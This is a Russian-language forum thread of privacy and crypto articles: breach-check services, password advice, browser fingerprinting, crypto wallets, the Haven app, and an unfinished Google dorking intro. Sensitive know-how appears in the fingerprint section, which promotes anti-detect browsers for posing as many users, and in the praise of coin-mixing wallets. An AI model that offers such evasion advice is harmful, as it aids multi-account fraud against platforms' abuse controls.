Лимит газа служит определенным ограничителем платы за перевод. Допустим, вы выставите лимит 1.000.000 газ, а смарт-контракту нужно лишь 50.000 газ, то вы и заплатите только 50.000. Лимит сделан для того, чтобы пользователь не переплатил в таком случае.

Вы сами устанавливаете цену в зависимости от того как быстро вы хотите, чтобы операция прошла. Есть хороший сервис ETH Gas Station, который служит калькулятором, позволяющим подобрать оптимальное значение цены за газ.

https://i.gyazo.com/3b59b11417a1019e...e3259919d2.jpg

Вывод

Газ делает обмен между пользователями максимально честным. Хотя вы ежедневно пользуетесь многими сервисами, не платя никакой комиссии, это не делает ваше взаимодействие прозрачным. Вместо платы, вы позволяете собирать о себе данные, показывать вам персонализированную рекламу, а значит - зарабатывать на ваших действиях. Тем не менее, вы можете не переплачивать за газ. Если вы продаете NFT, то выкладывайте свои токены на маркетплейсах, где не требуется оплата за транзакцию. Ну, а если вы инвестируете, то используйте калькулятор газа, чтобы подобрать подходящую комиссию.

BlackMAST 21.04.2022 17:08

Цитата:


Никогда нельзя недооценивать анонимность, ваша безопасность с легкостью может быть подорвана в любой момент. Ежесекундно утекает информация и данные с ваших устройств, а вы ничего не можете с этим поделать. Или можете? В этой статье вы узнаете, как определить, что произошла утечка данных, и что с этим делать.

https://i.gyazo.com/ed64c26530b30b21...9b6bd9dcaf.jpg

За последние годы многие пользователи смирились с тем, что с их телефонов и компьютеров отправляется большое количество данных в различные сервисы, которые он использует. Такой сбор данных выгоден компаниям для совершенствования своего продукта и создания персонализированной рекламы.

Если это не так сильно беспокоит вас, то следует знать, что помимо компаний, собирающих информацию, ваши данные могут быть украдены и слиты злоумышленниками. И это уже повод начать бить тревогу.

А вы уверены, что вы не стали одной из многих жертв хакеров, чьи пароли стали всеобщим достоянием? Давайте это проверим.

Сервисы для проверки паролей на предмет утечки:

1. Have I been pwned?

https://i.gyazo.com/46741326a468ae33...056d95ca56.jpg

Самый популярный сайт для проверки возможных утечек. Have I been pwned - это та же поисковая система, только с реверсивным поиском для проверки вашей почты и паролей в бесчисленной базе данных. Для того, чтобы выяснить попали ли ваши данные в руки злоумышленников, введите email, пароль и система выдаст эту информацию. Данный сервис был создан после одной из самых провокационных утечек, а именно, когда в 2013 году в сеть попали данные свыше 153 миллионов пользователей Adobe.

2. DeHashed

https://i.gyazo.com/41cffade2d36177c...3e51ffddbc.jpg

Сервис DeHashed создавался не только для простых пользователей, но и для компаний, журналистов, экспертов по безопасности и для всех, кто хочет сразу же узнавать о сливах данных. DeHashed осуществляет поиск по базам украденных персональных данных. С его помощью можно делать запрос по IP-адресам, логинам, паролям, телефонным номером, email адресам и др.

3. Sucuri Security Scanner

https://i.gyazo.com/26b0c0b89b503d6f...b3cdc78af6.jpg

Sucuri Security Scanner отличается от двух предыдущих сервисов, так как он ищет не только слитые логины и пароли, но и проверяет целые сайты на возможные хакерские атаки и утечки данных.

4. LeakCheck

https://i.gyazo.com/706385f6152d37fa...9fed7a230a.jpg

С помощью поиска на сайте LeakCheck вы можете узнать, был ли украден ваш пароль от email. Введите почтовый адрес, если произошла утечка, то сервис покажет пароли, которые находятся во всеобщем доступе.

5. SpyCloud

https://i.gyazo.com/d8c369a3afca23a5...84cd99fdba.jpg

SpyCloud имеет огромную базу данных, в которой также может оказаться ваш пароль или другие данные.

6. Firefox Monitor

https://i.gyazo.com/b1d86ea66e5d3405...1d6164f96b.jpg

Сервис Firefox Monitor разработан компанией Mozilla и представляет собой поиск по базе данных слитых паролей. Помимо этого, вы можете пройти регистрацию, чтобы первым быть в курсе возможных утечек.

7. GhostProject

https://i.gyazo.com/2eb47da3ab276fce...813e5a4735.jpg

И закрывает наш топ сервис GhostProject, который может похвастаться многочисленной базой в 1.5 млн слитых данных. Но это еще не все, так как база регулярно пополняется новыми утекшими данными.

Итог

Стоит с осторожностью и внимательностью относится к защите своих данных, ведь информация постоянно копируется, перехватывается и сливается без вашего ведома. О том, как действовать, если вы обнаружили себя в базе утекших данных, и что делать, чтобы этого не повторилось, мы расскажем в следующей части.

BlackMAST 25.04.2022 20:24



https://i.gyazo.com/2ad61c3bca07f490...06f31538c6.jpg

Вступить в наш чат
Цитата:


В первой части мы поделились с вами сервисами, которые помогают определить, попали ли ваши данные в руки хакеров или нет. Если логины и пароли попали в базу с утечками, то сайты это покажут. Но, что же дальше делать с этой информацией и как впредь обезопасить себя от взлома? Об этом расскажем в этой статье.

Как предотвратить утечку данных?

https://i.gyazo.com/f9a2fc1cd9966f0f...cd95d8a440.jpg

  • Создайте надежный пароль. В идеале он должен иметь от 20 до 40 символов и храниться только у вас в голове. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение - имена, псевдонимы, клички. Фразы и памятные даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.
  • Используйте разные пароли. Это, пожалуй, один из важных и ключевых моментов. Ведь многие пользователи пренебрегают этим правилом, используя один пароль для всего на свете. Чем это грозит? Если ваш пароль попадет в руки злоумышленника, то он получит доступ ко всем сервисам, что захочет. Поэтому никогда так не делайте, используйте для разных сервисов различные комбинации.
  • Меняйтесь пароли. Вдобавок к предыдущему пункту, в целях профилактики необходимо регулярно менять пароли, хотя бы раз в год. И, что более важно, не используйте старые пароли, так как вы снижаете вашу степень защиты.
  • Подключите двухфакторную аутентификацию. Например, пароль + СМС код. Такая комбинация не даст злоумышленникам получить доступ к вашему аккаунту, даже если у них будет пароль для входа. Такая мера значительно уменьшает шанс взлома. Помимо этого, сервисы, работающие с двухфакторной аутентификацией, как правило, оповещают вас, если была попытка входа в ваш профиль.
  • Не доверяйте ненадежным сервисам. Перед тем, как вводить свои данные на каком-нибудь сайте, внимательно изучите его, если вас мучают сомнения, то не рискуйте. Старайтесь указывать лишь необходимую информацию, нужную для работы сервиса.
  • Используйте лицензионные антивирусы. Это поможет уберечь ваш ПК от вирусов, тем самым снизив риск утечки личных данных.
  • Избегайте общественных сетей Wi-Fi, так как данные зачастую сливаются именно таким способом. Взломать и перехватить данные по Wi-Fi не составляет труда даже для новичка в этом деле, что уж тут сказать про профессионала. Но если все-таки вы вынуждены подключиться к общественной сети, то делайте это только с VPN - он переадресует ваши данные и убережет от взлома.
https://i.gyazo.com/047324aefb852b84...bb2c8bf4ba.jpg

Что делать, если утечка уже произошла?

Первое, что нужно уяснить, так это то, что нет необходимости впадать в панику, если вы узнали, что ваши данные слили. "Это еще почему?", - спросите вы. А потому, что утечки и сливы происходят в б̶о̶л̶ь̶ш̶о̶м̶ нереально огромном количестве. В открытую базу данных за раз могут попасть данные тысячи человек, а иногда даже миллиарда. Так что вероятность того, что заинтересуются именно вами крайне мала. Скорее всего вы уже 100 раз узнаете об утечке.

1. Если вы нашли себя в базе слитых данных, то вам нужно посмотреть, с какой утечкой это связано. В списке могут отображаться как утечки по сайтам, так и не привязанные к какому-то конкретному ресурсу. Каждый пункт сообщает, когда произошла утечка.

https://i.gyazo.com/45edfb6039ee574d...8d41209149.jpg

2. Когда вы выяснили, какие именно данные утекли в сеть, самое время начинать смену не только паролей, но и желательно самих email адресов. Если вы использовали разные пароли для сервисов, то вы сразу сможете понять, где была утечка, и вам не придется везде менять данные. Теперь вы еще больше понимаете, для чего нужны разные пароли для входа на каждый сервис.

Заключение

Если вам кажется, что вас никогда не взломают, и что ваши пароли надежные и не пробиваемые, то это не так. К несчастью, никто не может быть застрахован от утечки данных. Риск, того, что вас взломают, даже если вы будете следовать всем советам, все равно остается. Но это не значит, что нужно упрощать жизнь хакерам, всегда нужно быть начеку и принимать необходимые меры защиты.

BlackMAST 28.04.2022 19:58


Вступить в наш чат

Вся информация о цифровых активах навсегда остается в блокчейне, поэтому с помощью специальных инструментов для анализа транзакций, можно задеанонить пользователей.Если вы из вышесказанного ничего не поняли, то давайте разбираться.

Блокчейн - это непрерывная цепочка блоков, где содержатся все записи о сделках. Это основа всех криптовалют.

Блокчейн-анализ -это процесс наблюдения за транзакциями и самими участниками в блокчейне для отслеживания и проведения расследования по криптовалюте.

https://i.gyazo.com/7ab578a5cfb9f2df...2318ef7aaa.jpg

То, что попало в блокчейн остается там навечно

Блокчейн - это длинная цепочка разных информационных блоков, где каждый блок содержит данные о предыдущем. Что это значит? А то, что если транзакция была добавлена в блок, она хранится там отныне всегда, так как ее нельзя удалить. Но хранится в блокчейне информация о транзакциях, а не данные пользователей, поэтому установить связь между ними не так то просто.

Глобальное распределение

В основе блокчейна лежит система глобального распределения хранения данных. Как это понимать? Копия базы блокчейна хранится одновременно на всех устройствах, находящихся в его сети. Учитывая тот факт, что удалить данные из блокчейна не представляется возможным, то для того, чтобы избавиться от цифрового следа вам придется их удалить сразу на всех устройствах по всему миру, что на практике нереально.

Цифровой след

Каждая транзакция в блокчейне имеет свой адрес - TxID. С его помощью любой желающий может посмотреть сумму, откуда активы пришли и куда ушли. Узнать сохраненную информацию в блокчейне можно тут.

Расследования

Программное обеспечение для анализа блокчейнов играет важную роль в расследованиях, связанных с криптовалютами. Это дает возможность правоохранительным органам отслеживать тразакции и определять мошенников. Например, преступник использует некий сервис для конвертации криптоактивов в фиатные деньги. С помощью инструментов для анализа блокчейна можно определить используемый криптосервис, и если в нем реализована строгая политика KYC, это даст возможность идентифицировать реального преступника.

Компании, занимающиеся блокчейн-анализом, предоставляют также мощные инструменты визуализации для вручную управляемых исследований и реализуют различные алгоритмы кластеризации для идентификации криптосервисов.

Инструменты блокчейн-анализа

Инструменты для блокчейн-анализа - это способы для отслеживания транзакций и проведения расследований. Их задача - объединить транзакции в блокчейне и людей, совершавших эти переводы.

Основные функции инструментов для блокчейн-анализа:

Классификация адресов - одним из основных применений программного обеспечения является соотнесение блокчейн-адресов с реальными личностями. Для их определения, инструменты анализа блокчейнов используют такие методы, как алгоритмы кластеризации, веб-скрейпинг, мониторинг баз данных о мошенничествах и пылевые атаки.

Мониторинг транзакций и анализ рисков - блокчейн-анализ позволяет контролировать каждую транзакцию и оценивать риски исходя из того, откуда идут средства и какая история кошельков отправителя или получателя. Анализ рисков основывается на множестве параметров, таких как сумма транзакции, происхождение средств и история денежных потоков.

Инструменты для исследований и анализа — предоставляют средства визуализации для составления графов транзакций с целью обнаружения связей между ними.

̶А̶н̶о̶н̶и̶м̶н̶о̶с̶т̶ь̶

Все убеждены, что блокчейн и криптовалюты полностью анонимны. Но достаточно ли, чтобы скрыть преступление? В целом система действительно является анонимной и не имеет связей с лицами реального мира. Но в процессе использования криптовалюты сами пользователи раскрывают себя, связывая личность с адресом. "Каким образом?", - cпросите вы. Достаточно подтвердить свою личность или же указать кошелек на другой бирже и вся информация сохранится в базах данных.

С первого взгляда криптовалюта кажется идеальным решением для мошенников, но выходит, что система достаточно прозрачна, чтобы использовать ее в преступных целях.

Если кто-то совершил противозаконное действие, то его след не исчезнет из блокчейна, даже если это было очень давно. Да, вы можете отрицать, что система не идеальна, и что невозможно задеанонимизировать каждого мошенника. Отчасти это так, но, как мы знаем, алгоритмы постоянно совершенствуются, и поэтому нельзя ни в чем быть уверенным.

BlackMAST 02.05.2022 18:05

https://i.gyazo.com/27edf476a16a4e3e...d2f4404a4a.jpg

Вступить в наш чат

Цитата:


Каждому пользователю в интернете присваивается уникальный идентификатор или отпечаток пальца. Он содержит много информации о настройках и функциях браузера пользователя и используется для идентификации пользователя. В отпечаток входят десятки разных параметров — от языка, который вы используете, и временной зоны, в которой находитесь, до списка расширений и версии вашего браузера. Сюда же может входить информация об операционной системе, об объеме оперативной памяти, разрешении экрана устройства, параметрах шрифтов и многом другом. Эта комбинация данных называется fingerprint, а сбор этих данных называется фингерпринтингом.

Виды отпечатков
  • User agent - это элемент браузера, отражающий набор информации об устройстве. Включает браузер, программное обеспечение, устройство и многое другое;
  • Язык браузера;
  • IP и данные провайдера;
  • Canvas;
  • Cookie;
  • Часовой пояс;
  • Расширения;
  • Шрифт;
  • Плагины и их характеристика.
Cуществует более 50 параметров.

Цифровой отпечаток браузера представляет собой 32-битное число шестнадцатеричной системы. Полученный отпечаток браузера позволяет отслеживать пользователей в сети Интернет с точностью до 94%.
Цитата:


Важно: Отпечатки, как и User agent, в совокупности ведут лишь к уникализации, но никак не к деанонону пользователя.


Сookies и fingerprints - в чем разница

Файлы cookie являются неотъемлемой частью многих онлайн-транзакций. Владельцы сайтов считаю их одним из основных инструментов, используемых для отслеживания активности клиентов. Но этот метод уже является устарелым и малоэффективным.
На это есть несколько причин. Во-первых, любой пользователь может отклонить файлы. Во-вторых, стоит включить "режим инкогнито" и ваше присутствие станет на сайте незаметными. Файлы cookie отправляют данные не только владельцу ресурса, но и самому пользователю, поэтому всегда есть возможность оградить себя от них.
Но с фингерпринтами все стоит иначе. Этот метод анализирует информацию, отправляемую браузером на сайт, который посещает пользователь. Оцениваются несколько типов данных, таких как языковые настройки, шрифты, часовой пояс, разрешение экрана, установленные плагины и версии программного обеспечения. Все вместе это дает цельную картину о конкретном человеке.
Цитата:


Важно понимать, что смена IP-адреса не защищает ваш фингерпринт.


Опасности цифровых отпечатков
  • Деанон - причина номер один, из-за которой пользователи должны быть осторожны. Система помечает ваш компьютер специальной цифровой меткой в виде хэш-суммы, снятой по специальному алгоритму без вашего ведома. Таким образом, пользователь может быть деанонимизирован.
  • Fingerprints как регенератор cookies. Многие веб-сайты используют так называемые Flash LSO super cookies, которые позволяют восстанавливать куки, даже при их удалении. Отпечатки пальцев браузера могут не только восстанавливать всю библиотеку файлов cookie, но и отслеживать пользователей по их основной сетевой информации. В этом случае процесс очистки системы cookie становится бессмысленным и сайт все равно распознает клиента.
В следующих статьях вы узнаете:
  • Как понять, что сайт снимает фингерпринт;
  • Как изменить свой фингерпринт;
  • Как проверить свой отпечаток браузера.


BlackMAST 05.05.2022 19:38



https://i.gyazo.com/495cc2d636cdce89...94bb6da122.jpg

Вступить в наш чат

Ранее мы рассказали, что такое фингерпринт. В этой статье разберем для чего он используется, как сайты снимают отпечаток браузера и законно ли то.

https://i.gyazo.com/b3c485d6aa2a5be0...6cfce94cca.jpg

Для чего используется фингерпринт

Сайты собирают цифровые отпечатки своих посетителей, чтобы:
  1. Защита от мошенничества и спуфинга. Например, если система видит по отпечатку, что пользователь посещает сайт из непривычного места или незнакомого устройства, она может заподозрить, что аккаунт был взломан. В результате ваша учетная запись будет заморожена, пока вы лично не восстановите доступ.
  2. Бороться с ботами. Например, если кто-то попытается создать несколько учетных записей из одного и того же браузера, в какой-то момент соцсети его забанят.
  3. Показывать рекламу. Данные фингерпринта: информация о местоположении, языке и т.д. может использоваться сайтом для показа рекламы или обмена с другими сайтами. К сожалению, эта информация может сыграть против вас.
Как понять, что сайт снимает фингерпринт

Фингерпринтингом занимаются все крупные сайты, рекламные площадки, поисковики и соцсети. Они хотят собирать и знать как можно больше информации о своих пользователях.

Это двухуровневый процесс, который работает как на стороне сервера, так и на стороне пользователя.

На стороне сервера

Логи доступа к сайту

В этом случае речь идет о сборе данных, отправляемых браузером. Как минимум это:
  • Запрошенный протокол.
  • Запрошенный URL.
  • Ваш IP.
  • Referer.
  • User-agent.
Заголовки

Веб-серверы получают их из вашего браузера. Заголовок важен для того, чтобы запрашиваемый сайт работал в вашем браузере.

Например, информация в заголовке позволяет сайту узнать, используете ли вы ПК или мобильное устройство. В последнем случае вы будете перенаправлены на версию, оптимизированную для мобильных устройств. К сожалению, эти же данные попадут в ваш отпечаток.

Куки

Они играют очень важную роль в логировании. Так, вам обычно нужно решить, позволить ли вашему браузеру обрабатывать файлы cookie или полностью их удалять.

В первом случае сервер получает просто огромное количество данных о вашем устройстве и предпочтениях. Даже если вы не принимаете файлы cookie, сайт все равно будет собирать некоторые данные о вашем браузере.

Canvas Fingerprinting

В этом методе используется элемент холста HTML5, который WebGL также использует для рендеринга 2D- и 3D-графики в браузере.

Этот метод обычно заставляет браузер "принудительно" обрабатывать графическое содержимое, содержащее изображения, текст или и то, и другое. Этот процесс выполняется в фоновом режиме и невидим для вас.

Когда процесс завершен, canvas fingerprinting преобразует графику в хэш, что делает его уникальным идентификатором, упомянутым выше.

Таким образом, возможно получить следующую информацию о вашем устройстве:
  • Графический адаптер;
  • Драйвер графического адаптера;
  • Процессор (если нет выделенного графического чипа);
  • Установленные шрифты.
Логирование на стороне пользователя

Здесь подразумевается, что ваш браузер передает большое количество данных с помощью:

Adobe Flash и JavaScript

Когда JavaScript включен, данные о ваших плагинах и спецификациях железа передаются третьим лицам.

Если установлен и включен Flash, он предоставит еще больше данных, такие как:
  • Ваш часовой пояс;
  • Версию ОС;
  • Разрешение экрана;
  • Полный список установленных шрифтов.
Законно ли собирать фингерпринты

В отличие от файлов cookie, сбор которых без согласия пользователя невозможен, для фингерпринтов такого требования пока нет. Поэтому ограничений на сбор отпечатка браузера нет.
Цитата:


Читайте в следующей статье, возможно ли изменить свой отпечаток браузера и как это сделать.


BlackMAST 16.05.2022 16:49

Как изменить свой фингерпринт

https://i.gyazo.com/3f3eba5d30206b82...ab884ea0b5.jpg
Вступить в наш чат
Это третья часть серии статей про отпечатки браузера. Из прошлых двух статей мы выяснили:
  1. Фингерпринт – это система слежения за пользователями в интернете, основанная на сведениях из браузера и ПК.
  2. Отпечатки собирают большой объем информации из настроек и браузера, и компьютера в целом. Это языковые параметры, часовой пояс, разрешение экрана, наличие конкретных плагинов и многое другое.
  3. Если браузер помечен отпечатками, удаление cookies даст ограниченный эффект. Более эффективно полностью изменить настройки браузера и системы. Настройки не должны быть слишком уникальными, поскольку это приведет не к уменьшению, а к увеличению узнаваемости браузера.
  4. Полностью защититься от фингерпринтинга нельзя, но можно снизить уникальность.
Читать статьи полностью:
1 часть
2 часть
https://i.gyazo.com/b3c485d6aa2a5be0...6cfce94cca.jpg

Кому нужно менять свой фингерпринт

Фингерпринт необходимо менять:
  • Арбитражникам, маркетологам и другим диджитал-специалистам, которые пользуются несколькими аккаунтами. Меняя свой фингерпринт, они могут выдавать себя за других пользователей.
  • Всем, кто связан с финансовым бизнесом: криптовалюты, беттинг и др. Точно так же - выдавать себя за разных пользователей с помощью разных фингерпринтов.
  • Всем, кто хочет защитить свои данные в интернете.
Как изменить свой цифровой отпечаток

вручную

Для этого вам нужно заменить или отключить большую часть данных, из которых состоит ваш отпечаток пальца. Например:

Удалите cookie перед началом новой сессии;

Отключите Flash и JavaScript. Если их отключить, то сайт не сможет проанализировать некоторые данные, из которых состоит цифровой отпечаток, например шрифты;
  • Установите другой язык операционной системы;
  • Измените разрешение экрана устройства;
  • Установите другой язык браузера и измените масштаб веб-страницы;
  • Отключите Canvas. Например, с помощью CanvasBlocker;
  • Измените часовой пояс устройства.
Преимущество этого метода в том, что он бесплатный и не требует дополнительного программного обеспечения, но вам нужно будет постоянно тратить время на выполнение одних и тех же действий. Кроме того, сайты регулярно увеличивают объемы анализируемых данных, а значит вы не в состоянии предусмотреть все нюансы, потому фингерпринт все равно смогут распознать.

Веб-расширения

На рынке уже не первый год есть продукты, которые помогают замаскировать реальный цифровой отпечаток. Расширения помогают повысить уникальность отпечатка браузера.

Вот что можно рекомендовать:
  • Chameleon - модификация значений user-agent. Можно установить периодичность "раз в 10 минут", например.
  • Avast Antitrack устраняет трекеры и скрывает фингерпринты, но является платным.
  • Trace - защита от разных вариантов сбора отпечатков.
  • User-Agent Switcher - делает примерно то же, что и Chameleon.
  • Disconnect.me также обещает полную защиту от слежки в интернете.
  • Canvasblocker - защита от сбора цифровых отпечатков с canvas.

VPN

VPN - это самый простой способ обойти интернет запреты в некоторых странах, и защитить себя в интернете. Он изменяет ваш IP, тем самым маскирую вашу личность, но не скрывает данные о вашем браузере и его цифровом отпечатке. Также он не влияет на cookie.

По этой причине VPN недостаточно для арбитража трафика и работы с криптовалютой. Его нужно использовать в тандеме с другими методами.

Почитайте нашу статью о том, как выбрать VPN.

Антидетект браузеры

Это специальные программы, способные замаскировать фингерпринты. Вы можете настроить свой собственный отпечаток пальца или получить готовый из браузера. Все популярные антидетект браузеры хорошо справляются с этим, поэтому пользователи чаще, как правило, обращают внимание на стоимость, удобство и дополнительные функции. Стоит понимать, что полностью защититься от фингерпринтинга невозможно. Однако, объем информации, собираемой сторонними сервисами, может быть уменьшен.

Браузер Firefox

Этот браузер хорошо маскирует данные пользователей. Недавно разработчики защитили пользователей Firefox от стороннего сбора отпечатков пальцев. Но вы можете повысить уровень защиты еще больше следующим способом:

Для этого требуется зайти в настройки браузера, путем ввода в адресной строке «about:config». Затем выбираем и меняем следующие опции:
  • webgl.disabled — выбираем «true».
  • geo.enabled — выбираем «false».
  • privacy.resistFingerprinting — выбираем «true». Эта опция дает базовый уровень защиты против сбора отпечатков браузера. Но наиболее эффективна она при выборе и других опций из списка.
  • privacy.firstparty.isolate — меняем на «true». Эта опция позволяет блокировать cookies от first-party доменов.
  • media.peerconnection.enabled — необязательная опция, но, если вы работаете с VPN, ее стоит выбрать. Она дает возможность предотвратить утечку WebRTC и демонстрацию своего IP.
Также можно выделить и другие браузеры как AdsPower, Multilogin и Linken Sphere, которые подменяют данные пользователя и минимизируют след в интернете.

Выделенные серверы

Использование дедиков (от слова dedicated server) до сих пор считается одним из самым эффективных способов сохранения анонимности. Дедик - это физически отдельная машина, с которой никакие данные не передаются на вашу основную или рабочую.
  • Плюсы: Настройка HTTP/SOCKS-прокси или SSH/VPN-соединения на выбор; Контроль истории запросов; Спасает при атаке через Flash, Java, JavaScript, если использовать удаленный браузер;
  • Минусы: Относительно высокая стоимость;
  • Необходимы технические знания для правильной настройки.
Такие виртуальные компьютеры являются новыми и чистыми для интернета, а их популярность и эффективность во многом обусловлены их круглосуточной работой и отсутствием распространения какой-либо информации о конечных пользователях или характеристиках их компьютеров.

Цитата:


Узнайте в следующей статье как проверить свой отпечаток браузера.

https://telegra.ph/Kak-izmenit-svoj-fingerprint-04-24




BlackMAST 16.05.2022 16:50

https://i.gyazo.com/a6c8a51f00c74991...f35328963d.jpg

Вступить в наш чат

Цитата:


Криптовалюта все больше и больше входит в повседневную жизнь человека. На сегодняшний день почти все услуги можно оплатить криптовалютой. Криптовалюта, в отличие от обычный денег, не хранится в реальном или виртуальном кошельке, а только в блокчейн.


В этой статье мы подробно ознакомились с криптокошельками, рассмотрели их различные виды и сравнили между собой. Коротко напомним о том, какие бывают виды криптокошельков.

Типы кошельков

Все криптокошельки можно объединить в несколько основных видов:
  • кошельки для ПК;
  • для мобильных устройств;
  • аппаратные;
  • бумажные кошельки;
  • онлайн-кошельки.
Несмотря на многообразие видов, крайне сложно выбрать надежный и безопасный криптокошелек, но мы вам с этим поможем.

Зачем всё это надо?

Нынешняя финансовая система без конца диктует, установленные правила, как ВАМ можно, а как нельзя потратить ВАШИ собственные деньги. Поскольку биткоин называют "устойчивый к цензуре", это дает своего рода гарантии, что ни правительство, ни ваш банк не смогут ограничить ваши действия.

Как лучше хранить крипту?

Какой криптокошелек лучше выбрать? Это зависит от различных условий. Самое главное - это безопасность и надежность, проверенная временем. Ну и, конечно же, ваши потребности. Например, если вам нужно хранить много денег, рекомендуется купить аппаратный кошелек, а если вы торгуете на бирже, то можно хранить криптовалюту прямо на ней, не платя комиссию за перевод.

https://i.gyazo.com/af4e6bdbea45951a...c7be66783e.jpg

Топ-5 криптокошельков для биткоина

1. Electrum

Electrum - один из самых популярных кошельков для BTC.
  • Кошелек имеет открытый исходный код и позволяет совершать массовые платежи, используя автономное, холодное хранение. Обладает двумя уровнями шифрования.
  • Electrum классифицируется как легкий кошелек. Нет необходимости загружать сеть блокчейна, а сама установка будет завершена за считанные минуты.
  • Electrum - один из первых криптовалютных кошельков, история которого насчитывает более 10 лет. Этот проект имеет хорошую репутацию и уже много лет является одним из лидирующих на рынке криптовалют.
  • Он работает как в десктопной версии, так и в мобильном приложении. Electrum совместим с системами Windows, Linux, OSX и Android.

https://i.gyazo.com/bc7fee8a91fd452e...c1fd1ad649.jpg

2. Exodus

Exodus – удобный мобильный кошелек с простым функционалом.
  • Exodus поддерживает функцию стейкинга и обмена криптовалют, а также хранение более ста различных криптовалют.
  • Из плюсов можно выделить простоту и удобство в использовании, понятный интерфейс, а также встроенный обмен криптовалюты и синхронизацию кошельков на нескольких устройствах.
  • Мобильный кошелек имеет ограниченный функционал по сравнению с десктопным клиентом, но для новичков есть все необходимые функции.
  • Exodus имеет поддержку 24/7.

https://i.gyazo.com/30af9e0084ea1c22...cb2f9d978b.jpg

3. Samourai

Samourai - это кошелек BTC для пользователей Android с упором на конфиденциальность. Созданный в 2015 году, Samurai Wallet является одним из первых клиентов, поддерживающих обновления сети биткойнов Segregated Witness. Кроме того, Samurai имеет множество дополнительных функций:
  • Модуль Dojo, который позволяет развернуть полный узел plug-n-play;
  • STONEWALL - опция, удаляющая цифровой след из метаданных и защищающая пользователя от деанонимизации;
  • PayNym - маскирует адрес от всех, кроме отправителя и получателя;
  • Scrambled PIN - защищает захват экрана шпионскими программами;
  • Удаленные SMS - позволяют стереть и восстановить учетную запись, если ваш телефон был потерян или украден;
  • Whirlpool или водоворот, который разрывает связь между входом и выходом транзакции, что затрудняет отслеживание.
  • Samurai готов постоять за вашу приватность. Поскольку функция хранилища полностью отсутствует, вы всегда можете управлять своими закрытыми ключами. Для начала работы с Samourai вам не нужно вводить свой адрес электронной почты или подтверждать свою личность, просто установите его.

https://i.gyazo.com/ddbd196235e9a6b0...4cf831b0c1.png

4. Wasabi

Wasabi - проверенный временем десктопный кошелек.
  • Он имеет открытый исходный код и использует CoinJoin (специальный тип биткоин-транзакций, при котором несколько пользователей объединяются, чтобы соединить свои монеты в одну транзакцию). Этот протокол значительно повышает анонимность держателей монет. Эта концепция существует с момента появления биткоина, но лишь немногие криптокошельки ее реализовали.
  • Особенностью Wasabi является интеграция с холодными аппаратными кошельками, а также с сетью Tor, что гарантирует безопасность и анонимность.
  • Васаби доступен на платформах Windows, Mac OS и Linux.

https://i.gyazo.com/480229c7866557a5...2c5969dd72.jpg

5. Cake Wallet

Cake Wallet - один из лучших кошельков для пользователей iOS. Он позиционирует себя в качестве кошелька №1 в сфере безопасности хранения средств. Только владелец кошелька отвечает за личные ключи и может ими управлять, таким образом, Cake безопаснее, чем большинство настольных кошельков или веб-кошельков.
  • Имеет открытый исходный код;
  • Поддерживает нескольких валют XMR, BTC и LTC;
  • Встроенный обменник. В приложении можно конвертировать ADA, ВСН, DAI, EOS, USDT, TRX и другие монеты;
  • Возможность купить криптовалюту в самом приложения;
  • Поддержка нескольких кошельков и учетных записей в одном приложении;
  • Возможность создания резервных копий кошелька локально или в облаке.

BlackMAST 19.05.2022 18:29



Вступить в наш чат

Цитата:


Наверняка у каждого из вас есть как минимум один ненужный телефон, который пылится на полке. Но вы будете удивлены, узнав, что ему можно найти очень хорошее применение. Превратите его в удаленную систему наблюдения с детектором движения и возможностью записи происходящего.

https://i.gyazo.com/020602b860cff8a4...3a00dfe54c.jpg

Haven

Как же это сделать? Сегодня мы расскажем про одно очень необычное приложение, которое предназначено как раз для это цели - Haven. Его создатель - Эдвард Сноуден, известный IT-специалист и спецагент.

Это приложение на базе Android использует встроенные сенсоры для создания системы наблюдения и защиты личного пространства. Haven превращает любой Android-телефон в детектор движения, звука, вибрации и освещённости, предупреждая о нежданных гостях.

Haven применяет сквозное шифрование для защиты данных. В отличие от похожих платных приложений, Haven не использует сомнительные облачные хранилища, а все уведомления отправляет через Signal и Tor.

Установка

Так как Haven доступно только для пользователей Android, любителям iOS рекомендуют приобрести дешевый Android-смартфон и использовать его как шпионское устройство, получая уведомления на свой iPhone.

Цитата:


Скачать приложение можно тут.


Когда вы запустите его, вам будет предложено установить границу шума и движения, отрегулировав их в зависимости от исходящих звуков. Например, исключите срабатывание на стиральную машинку или работающий холодильник. В качестве сенсора движения используется фронтальная или задняя камера. Соответственно, телефон можно спрятать в укромном месте, так чтобы камера записывала происходящее.

https://i.gyazo.com/4a7c2eab72bdc2b6...04de7b2d77.jpg

Приложение Heaven также предлагает связать ваше устройство, добавив номер для получения мгновенных оповещений, которые будут поступать по защищённым каналам. Доступ к логам предоставляется в удалённом режиме через Tor, то есть можно почти в реальном времени смотреть и слышать, что происходит в доме. В логах сохраняются данные со всех сенсоров, фотографии и звуковые файлы. Любую информацию можно посмотреть, удалить или быстро обнародовать через Signal, WhatsApp, Gmail, Google Drive или другой файлохостинг.

Приложение использует ниже указанные сенсоры, а затем записывает в журнал событий на устройстве:
  • Акселерометр: физическое перемещение самого телефона и вибрация;
  • Камера: движение в поле зрения фронтальной или задней камеры телефона;
  • Микрофон: посторонние звуки поблизости;
  • Освещение: изменения в освещении, определяемые фоточувствительным сенсором;
  • Питание: определяет потерю питания или отсоединение телефона от сети питания.
Итог

Это приложение станет незаменимым для параноиков, в хорошем смысле этого слова и просто для людей, которые ценят безопасность. Haven поможет выявить проникновение, будь то в ваш дом или номер в отеле и остановить злоумышленника. Без подобной системы охраны нельзя быть уверенным, что в ваше отсутствие вам ничего не грозит. Сам Эдвард Сноуден выразился:

«Haven не просто прикрывает вас, она дает душевное спокойствие».

BlackMAST 24.05.2022 00:49



Вступить в наш чат
Что такое Google Dork?
Google Dork, также известный как Google Dorking или Google Hacking, стал ценным ресурсом для исследователей безопасности. А вот для обычного человека Google - это всего лишь поисковый сервис для картинок, видео, новостей. Но на сегодняшний день Google является одним из самых полезных инструментов для взлома и кражи информации, который используют хакеры.

Google Dork - это метод взлома компьютера, использующий приложения Google, такие как Google Search. Делается это очень просто через дыры в поисковом запросе. Иначе говоря, Google Dork - это использование возможностей собственной поисковой системы Google для поиска уязвимых приложений и серверов.

Как работает Dork?
